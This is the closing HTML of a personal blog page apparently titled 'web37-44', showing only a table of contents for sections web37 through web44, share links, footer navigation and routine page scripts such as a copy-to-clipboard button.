        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#web37"><span class="toc-number">1.</span> <span class="toc-text">web37</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web38"><span class="toc-number">2.</span> <span class="toc-text">web38</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web39"><span class="toc-number">3.</span> <span class="toc-text">web39</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web40"><span class="toc-number">4.</span> <span class="toc-text">web40</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web41"><span class="toc-number">5.</span> <span class="toc-text">web41</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web42"><span class="toc-number">6.</span> <span class="toc-text">web42</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web43"><span class="toc-number">7.</span> <span class="toc-text">web43</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web44"><span class="toc-number">8.</span> <span class="toc-text">web44</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://youngking-gfy.github.io/2025/03/12/web37-44/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&text=web37-44"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&is_video=false&description=web37-44"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=web37-44&body=Check out this article: https://youngking-gfy.github.io/2025/03/12/web37-44/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&title=web37-44"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://youngking-gfy.github.io/2025/03/12/web37-44/&name=web37-44&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://youngking-gfy.github.io/2025/03/12/web37-44/&t=web37-44"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Y0ungK1ng
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/youngking-gfy">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
